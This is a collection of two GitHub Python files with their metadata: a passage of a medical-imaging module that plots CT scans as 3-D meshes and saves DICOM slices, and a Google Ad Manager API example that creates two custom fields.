    3-D surface meshes via marching cubes."""

    logging.basicConfig(level=logging.INFO)
    log = logging.getLogger(__name__)

    def plot_3d(self, image, threshold=-300):
        """Render an interactive 3-D surface mesh of `image`.

        Adapted from:
        https://www.kaggle.com/gzuidhof/data-science-bowl-2017/full-preprocessing-tutorial

        Args:
            image: 3-D voxel array of a CT stack.
            threshold: iso-value (Hounsfield units) at which the
                marching-cubes surface is extracted.
        """
        # Position the scan upright,
        # so the head of the patient would be at the top facing the camera.
        p = image.transpose(2, 1, 0)
        verts, faces = measure.marching_cubes(p, threshold)

        fig = plt.figure(figsize=(10, 10))
        ax = fig.add_subplot(111, projection='3d')

        # Fancy indexing: `verts[faces]` yields one (3, 3) triangle per face.
        mesh = Poly3DCollection(verts[faces], alpha=0.1)
        face_color = [0.5, 0.5, 1]
        mesh.set_facecolor(face_color)
        ax.add_collection3d(mesh)

        ax.set_xlim(0, p.shape[0])
        ax.set_ylim(0, p.shape[1])
        ax.set_zlim(0, p.shape[2])
        plt.show()

    def plot(self, dataset):
        """Log that `dataset`'s slice is being plotted.

        Fix: the original omitted `self` and referenced the class attribute
        `log` as a bare name, which raises NameError inside a method body.
        """
        # NOTE(review): `PatientsName` is the old pydicom (<1.0) attribute
        # spelling; newer pydicom uses `PatientName` -- confirm against the
        # installed pydicom version.
        self.log.info("plotting {}".format(dataset.PatientsName))

    def save(self, dataset):
        """Save `dataset`'s pixel data to '<patient name>.png'.

        Fix: the original omitted `self`, referenced bare `log` (NameError),
        and called `pylab`, whose import was commented out at module top
        (NameError at call time). Uses matplotlib.pyplot instead, which is
        already imported for plot_3d.
        """
        self.log.info("saving {}".format(dataset.PatientsName))
        plt.imshow(dataset.pixel_array, cmap=plt.cm.bone)
        plt.savefig(dataset.PatientsName + '.png',
                    bbox_inches='tight')
|
{
"content_hash": "c51e24e6ae39f17947dbdeb5c7d7c131",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 90,
"avg_line_length": 32.15217391304348,
"alnum_prop": 0.6382691007437458,
"repo_name": "2PacIsAlive/DeepOncology",
"id": "be4f91f2a1b78b948761fccd6f45c39174857ccc",
"size": "1479",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "deep_networks/data/dicom/plot.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "15124"
},
{
"name": "Python",
"bytes": "18987"
}
],
"symlink_target": ""
}
|
"""This example creates custom fields.
To determine which custom fields exist, run get_all_custom_fields.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
import uuid
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
  """Creates two example LINE_ITEM custom fields on the network.

  Args:
    client: an initialized ad_manager.AdManagerClient.
  """
  # Initialize appropriate service.
  custom_field_service = client.GetService(
      'CustomFieldService', version='v202208')

  # Each field needs a unique name; only name and dataType vary between them.
  field_specs = [
      ('Customer comments #%s' % uuid.uuid4(), 'STRING'),
      ('Internal approval status #%s' % uuid.uuid4(), 'DROP_DOWN'),
  ]
  custom_fields = [
      {
          'name': name,
          'entityType': 'LINE_ITEM',
          'dataType': data_type,
          'visibility': 'FULL',
      }
      for name, data_type in field_specs
  ]

  # Add custom fields.
  created_fields = custom_field_service.createCustomFields(custom_fields)

  # Display results.
  for created_field in created_fields:
    print('Custom field with ID "%s" and name "%s" was created.'
          % (created_field['id'], created_field['name']))
if __name__ == '__main__':
  # Initialize the client from the local "googleads.yaml" credentials file
  # and run the example.
  main(ad_manager.AdManagerClient.LoadFromStorage())
|
{
"content_hash": "d0fdeed77211b38dea8edccf1f7eade9",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 77,
"avg_line_length": 28.96,
"alnum_prop": 0.6636740331491713,
"repo_name": "googleads/googleads-python-lib",
"id": "ece4fb1b84fe1928ea21a2cd56d5f01e30327c16",
"size": "2070",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "examples/ad_manager/v202208/custom_field_service/create_custom_fields.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "403821"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.